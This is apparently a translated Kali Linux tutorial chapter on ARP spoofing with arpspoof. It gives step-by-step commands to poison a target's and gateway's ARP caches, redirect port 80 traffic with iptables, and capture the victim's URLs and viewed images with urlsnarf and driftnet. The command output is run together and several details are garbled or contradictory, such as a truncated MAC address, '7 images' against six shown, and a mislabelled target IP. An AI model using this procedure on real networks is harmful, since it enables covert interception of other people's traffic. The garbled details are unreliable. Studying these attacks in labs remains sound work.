Arpspoof is a very good source code program for ARP spoofing. Its operation does not affect the communication of the entire network, and the tool achieves spoofing to the target by replacing the data in the transmission. This section describes the use of the Arpspoof tool.
9.8.1 URL Traffic manipulation attack
The URL traffic operation is very similar to a man-in-the-middle attack, injecting routed traffic to the Internet through the target host. This process will implement the attack through ARP injection. This section describes the use of the Arpspoof tool to implement URL traffic manipulation attacks. Use the Arpspoof tool to implement URL traffic manipulation attacks. The procedure is as follows:
(1) Turn on the route forwarding function. The execution commands are as follows:
[email protected]:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
After executing the above command, there is no information output.
(2) Start the Arpspoof injection attack target system. An attack is made by an attacker (192.168.6.102) sending an ARP packet to spoof the Gateway (192.168.6.1) and the target system (192.168.6.101). The following first deceives the target system, and executes the command as follows:
[email protected]:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.150:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
The output information shows the packets sent by the attacker to the target host 192.168.6.102. Where 50:e5:49:eb:46:8d represents the attacker's MAC address, and 19:21:3f:c3:e5 represents the MAC address of the 192.168.6.101. When the above process is successful, the target host 192.168.6.101 sends the data to the Gateway 192.168.6.1, which is sent to the attacker 192.168.6.102.
(3) Inject the attack gateway with Arpspoof. The execution commands are as follows:
[email protected]:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.10150:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
The above output information shows the packets sent by the attacker to the gateway 192.168.6.1. When the attack succeeds, the gateway 192.168.6.1 sends the information on the target system 192.168.6.101 to the attacker's host 192.168.6.102.
(4) After successful execution of the above steps, the attacker is equivalent to controlling the data transmitted by the gateway and the target host. An attacker can view the information that is important on the target system by receiving the data.
To verify the above information, here is a simple example.
"Instance 9-7" validates the Arpspoof tool attack by using the Wireshark capture package. The following steps are shown below.
(1) Start the Wireshark tool. On the Kali Linux desktop, select Applications | Kali linux| The Top Security tools|wireshark command will display the interface shown in 9.49.
Figure 9.49 Wireshark start-up interface
(2) Under Start of the interface, select the interface to capture. Select Eth0 here and click the Start button to display the interface shown in 9.50.
Figure 9.50 Grasping the package interface
(3) The interface can set up the Wireshark and start, stop and refresh the packets.
(4) Ping the gateway 192.168.6.1 on the target system 192.168.6.101. The execution commands are as follows:
C:\Users\Administrator>ping 192.168.6.1
After the above command has been executed, check the Wireshark crawl packet to Kali, as shown in 9.51.
Figure 9.51 Captured packets
(5) This interface shows the process of data transfer between 192.168.6.101 and 192.168.6.1. Where the transmission of the entire process is numbered 28-33,28-30 is a request packet process, and 31-33 is the target response packet process. The captured packets are analyzed in detail below.
- 28: Indicates that the 192.168.6.101 (source) sends a PING request to the 192.168.6.1 (destination).
- 29: Indicates that the 192.168.6.102 will forward 192.168.6.101 packets.
- 30: Indicates that 192.168.6.102 will forward the packet, and then send the request to 192.168.6.1.
- 31: Represents the target host 192.168.6.1 response 192.168.6.101 request.
- 32: Indicates that the response is sent to 192.168.6.102, at which point the host is forwarded to 192.168.6.1.
- 33: Target host 192.168.6.1 sends forwarded data to 192.168.6.101.
9.8.2 Port redirection attack
Port redirection is also called port forwarding or port mapping. The port redirects the process of receiving a port packet (such as 80 port) and redirects its traffic to a different port (such as 8080). The benefit of implementing this type of attack is that it can be endless, as it redirects secure ports to unencrypted ports, redirecting traffic to a specific port on the specified device. This section describes using Arpspoof to implement port redirection attacks. Use Arpspoof to implement port redirection attacks. The following steps are shown below.
(1) Turn on Routing and forwarding attacks. The execution commands are as follows:
[email protected]:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
(2) Start the Arpspoof tool to inject traffic into the default network. For example, the default gateway address in this example is 192.168.6.1. The execution commands are as follows:
[email protected]:~# arpspoof -i eth0 192.168.6.1
After executing the above command on Kali Linux, there is no output information. This is a bug on the Kali 1.0.6 because the version of the Dsniff package in the system is dsniff-2.4b1+debian-22. When the Execute arpspoof command does not specify a target system, only the Dsniff package is dsniff-2.4b1+debian-21.1 to function correctly.
(3) Add a firewall rule with port redirection. The execution commands are as follows:
[email protected]:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
After executing the above command, there is no output.
When the above setting is successful, when the user sends a request to port 80 of the Gateway 192.168.6.1, it will be forwarded to the 8080 port to be sent to the attacker's host.
9.8.3 capturing and monitoring wireless network data
Using a man-in-the-middle attack, the Kali Linux operating system can be placed between the target host and the router. This allows the user to capture all data from the target host. This section describes the use of the Arpspoof tool to implement a man-in-the-middle attack to capture and monitor wireless network data.
(1) Turn on the router forwarding function. The execution commands are as follows:
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
(2) Use the Arpspoof command to attack the host. The execution commands are as follows:
[email protected]:~# arpspoof-i eth0-t 192.168.6.106 192.168.6.10:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29 : 7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:C:29:FC: a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 i S-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192 .168.6.1 is-at 0:c:29:7a:59:750:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42:arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 ...
Executing the above command tells the 192.168.6.106 (target host) that the gateway's MAC address is 00:0c:29:7a:59:75 (attack host). When the target host receives the message, it modifies the corresponding gateway ARP entry in the ARP cache table. After executing the above command, it does not stop automatically. If you do not need to attack, press CTRL + C key combination to stop the attack.
(3) View the destination host's access to the URL address information. The execution commands are as follows:
[email protected]:~# urlsnarf-i eth0urlsnarf:listening on eth0 [TCP port or port 8080 or port 3128]192.168.6.106 --[16/jul/2014:13:12:30 +0800] "GET http://192.168\. 6.1:1900/igd.xml http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:30 +0800]" GET htt P://192.168\. 6.1:1900/l3f.xml http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:30 +0800]" GET htt P://192.168\. 6.1:1900/ifc.xml http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:33 +0800]" GET htt P://192.168\. 6.1:1900/ipc.xml http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:37 +0800]" GET htt P://192.168\. 6.1:1900/igd.xml http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:37 +0800]" POST HT Tp://192.168\. 6.1:1900/IPC http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:37 +0800]" POST http:/ /192.168\. 6.1:1900/IFC http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:37 +0800]" POST http://192.168 \. 6.1:1900/IPC http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "192.168.6.106--[16/jul/2014:13:12:37 +0800]" POST http:/ /192.168\. 6.1:1900/IFC http/1.1 "--"-"" microsoft-windows/6.1 upnp/1.0 "
The above output information shows the target host to access the Internet information.
(4) Users can also use the Driftnet tool to capture images viewed by the target system. The execution commands are as follows:
[email protected]:~# driftnet -i eth0
After executing the above command, a window will open. When a target host accesses a picture in a webpage, it is displayed in that window.
(5) Now to the target host, access the Internet to generate capture information. For example, if a Web page is accessed by a browser on the target host, the attack host will display the interface shown in 9.52.
Figure 9.52 Picture of destination host access
(6) The interface shows all the images accessed on the target host. Now the user can click on any one of the pictures in Figure 9.52, the picture will be saved to the Kali host. At this point the driftnet command will appear with the following information:
[email protected]:~# driftnet -i eth0driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png‘ as `driftnet-0.png‘driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png‘ as `driftnet-1.png‘driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4ca5d888a08.jpeg‘ as `driftnet-2.jpeg‘driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png‘ as `driftnet-3.png‘driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png‘ as `driftnet-4.png‘driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d5351a9a9e69.png‘ as `driftnet-5.png‘
As you can see from above, the 7 images captured by Driftnet are saved. Their filenames are driftnet-*.png, and these files are saved by default in the current directory.
(7) The user can use the Linux-brought image viewer to view, 9.53 shows.
Figure 9.53 Captured picture
(8) The interface shows the fourth picture. The user can toggle the captured picture by clicking the next or Previous button.
Kali-linux Arpspoof Tools